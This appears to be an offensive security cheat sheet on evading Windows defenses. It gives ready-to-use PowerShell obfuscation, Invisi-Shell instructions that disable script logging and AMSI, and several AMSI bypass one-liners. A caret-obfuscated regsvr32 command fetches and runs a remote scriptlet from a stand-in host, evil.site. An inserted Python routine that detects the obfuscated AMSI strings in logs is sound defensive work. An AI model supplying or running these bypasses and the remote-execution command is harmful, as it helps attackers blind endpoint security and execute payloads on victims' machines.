Defense Evasion

Techniques to bypass defensive measures that might exist on a Windows system.


PowerShell

String Token Manipulation

Obfuscate simple PowerShell scripts by splitting each string into tokens and reassembling them at run time with the -f format operator:

Write-Host "Who am I?"
Write-Host ("{2}{0}{1}"-f'o am',' I?','Wh')

This also works on simple commands using the call operator (&):

whoami
&("{0}{1}{2}"-f'who','am','i')

Or even on cmdlets that take arguments, by assembling the whole command line as a string and handing it to IEX (Invoke-Expression):

IEX "Write-Host Who am I?"
IEX (("{2}{1}{0}"-f'ost','te-H','Wri') + " " + ("{2}{0}{1}"-f'o am',' I?','Wh'))

Invisi-Shell

Bypass all PowerShell security features by registering a single DLL as a CLR profiler (through the COR_PROFILER environment variables below) and hooking the related .NET functions to make them ineffective. This effectively disables all logging features (script block, module and transcription logging) in addition to AMSI. Requires dropping a DLL file on the target filesystem.

$env:COR_ENABLE_PROFILING="1"
$env:COR_PROFILER="{cf0d821e-299b-5307-a3d8-b283c03916db}"
$env:COR_PROFILER_PATH="\path\to\invisishell.dll"

cmd.exe /k "powershell.exe -w hidden -nop -c [PowerShell]"

Remove-Item env:COR_ENABLE_PROFILING
Remove-Item env:COR_PROFILER
Remove-Item env:COR_PROFILER_PATH

Binary: invisi-shell.dll

Tip

Weaponize this technique by executing the stager and payload via web delivery (see personal projects).

Anti-Malware Scan Interface (AMSI)

AMSI passes the strings that Windows scripting engines (PowerShell, VBScript, JScript) are about to interpret to the registered anti-virus provider for signature-based scanning before they execute.

Matt Graeber (@mattifestation)

Sets the internal amsiInitFailed flag to true so that PowerShell behaves as if loading amsi.dll had failed and skips scanning for the rest of the session.

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null,$true)

Tip

Working obfuscation as of 22/10/2018:

[Ref].Assembly.GetType(("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}"-f'Sy','ste','m.M','anage','men','t.Au','tomat','ion.A','m','s','iU','til','s')).GetField(("{0}{1}{2}{3}{4}{5}"-f'am','si','I','nitF','ail','ed'), 'NonPublic,Static').SetValue($null,$true)

Others (not tested)

$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)

[ScriptBlock]."GetField"('signatures','NonPublic,Static').SetValue($NULL,(New-Object Collections.Generic.HashSet[string]))
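A defender-side normaliser for the two obfuscation forms shown on this page (the -f string-token trick in the PowerShell section and the split-up AMSI one-liner in the Tip above). This is an added example, not code from the original notes: it folds format expressions and string concatenations in a script block log entry back into plain literals, then checks the result for the AmsiUtils field names, which is how a review of 4104 events still catches the obfuscated variant. The sample log entries are constructed from the page's own snippets, the function names (deobfuscate, amsi_indicators) are mine, and escaped quotes and {{ }} literals are deliberately not handled.

```python
import re

# Constructed script-block log entries (event 4104 style), built from this page's snippets.
SAMPLE_LOG = [
    "Write-Host (\"{2}{0}{1}\"-f'o am',' I?','Wh')",
    "&(\"{0}{1}{2}\"-f'who','am','i')",
    "IEX ((\"{2}{1}{0}\"-f'ost','te-H','Wri') + \" \" + (\"{2}{0}{1}\"-f'o am',' I?','Wh'))",
    "[Ref].Assembly.GetType((\"{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}\"-f'Sy','ste','m.M',"
    "'anage','men','t.Au','tomat','ion.A','m','s','iU','til','s')).GetField((\"{0}{1}{2}{3}{4}{5}\""
    "-f'am','si','I','nitF','ail','ed'), 'NonPublic,Static').SetValue($null,$true)",
]

QUOTED = r"""(?:'[^']*'|"[^"]*")"""  # one string literal (escaped quotes not handled)
# ( "<template with {n} placeholders>" -f 'arg0','arg1',... )
FORMAT_EXPR = re.compile(
    r"""\(\s*(["'])([^"']*)\1\s*-f\s*(""" + QUOTED + r"(?:\s*,\s*" + QUOTED + r")*)\s*\)",
    re.IGNORECASE)
# 'left' + "right"  ->  'leftright'
CONCAT_EXPR = re.compile("(" + QUOTED + r")\s*\+\s*(" + QUOTED + ")")

def _resolve_format(m):
    # Substitute each {n} with the n-th -f argument, as PowerShell would.
    template, values = m.group(2), [v[1:-1] for v in re.findall(QUOTED, m.group(3))]
    try:
        text = re.sub(r"\{(\d+)\}", lambda p: values[int(p.group(1))], template)
    except IndexError:  # fewer arguments than placeholders: leave it untouched
        return m.group(0)
    return "'" + text + "'"

def deobfuscate(script):
    """Fold -f expressions and literal concatenations until nothing changes."""
    prev = None
    while prev != script:
        prev = script
        script = FORMAT_EXPR.sub(_resolve_format, script)
        script = CONCAT_EXPR.sub(lambda m: "'" + m.group(1)[1:-1] + m.group(2)[1:-1] + "'", script)
    return script

# Names used by the AMSI bypass one-liners on this page; a hit after
# normalisation is worth an alert however the string was split up.
AMSI_INDICATORS = ("AmsiUtils", "amsiInitFailed", "amsiContext", "amsiSession")

def amsi_indicators(script):
    """Sorted list of the indicators present in the normalised script."""
    plain = deobfuscate(script)
    return sorted(tok for tok in AMSI_INDICATORS if tok in plain)
```

Run deobfuscate over each SAMPLE_LOG entry to see the plain command each one-liner expands to; only the last entry yields AMSI indicators.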

CMD Obfuscation

Insert the ^ escape character throughout a malicious CMD command line: cmd.exe strips it when parsing, so the command still runs while the literal string no longer matches simple AV signatures.

Example:

r^E^g^S^v^R^3^2 /^s /^n /^u /^i:http://evil.site/policy.sct s^C^r^O^b^j.D^l^L